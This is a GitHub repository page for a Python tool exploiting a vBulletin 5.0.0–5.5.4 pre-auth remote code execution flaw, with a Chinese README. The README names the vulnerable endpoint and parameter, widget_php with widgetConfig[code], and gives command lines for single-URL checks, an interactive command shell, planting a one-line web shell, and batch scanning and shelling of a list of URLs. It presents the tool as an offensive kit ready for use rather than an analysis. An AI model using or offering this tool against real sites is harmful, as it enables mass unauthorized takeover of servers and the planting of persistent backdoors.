Skip to content
vbulletin 5.0.0 till 5.5.4 pre-auth rce
Python
Branch: master
Clone or download
Latest commit d951a3d Oct 3, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
batch_result/20191002155708
demo init Oct 2, 2019
LICENSE Initial commit Oct 2, 2019
README.md init Oct 2, 2019
urls.txt init Oct 2, 2019
vbulletin5-rce.py init Oct 2, 2019

README.md

vbulletin5 rce漏洞检测工具

0x00 概述

201909 vbulletion5(5.0.0-5.5.4)爆出rce漏洞,利用文件ajax/render/widget_php和post参数widgetConfig[code]可直接远程代码执行。

本工具支持单url检测,cmdshell,get web shell(写入一句话木马),批量检测,批量getshell。

0x01 需求

python2.7

pip install requests

0x02 快速开始

使用帮助: python vbulletin5-rce.py -h

单url漏洞检测: python vbulletin5-rce.py -u "http://www.xxx.com/"

cmdshell: python vbulletin5-rce.py -u "http://www.xxx.com/" --cmdshell

单url getshell: python vbulletin5-rce.py -u "http://www.xxx.com/" --getshell

批量检测: python vbulletin5-rce.py -f urls.txt

批量getshhell: python vbulletin5-rce.py -f urls.txt --getshell

0x03 反馈

issus

gmail:lsasguge196@gmail.com

qq:2894400469@qq.com

You can’t perform that action at this time.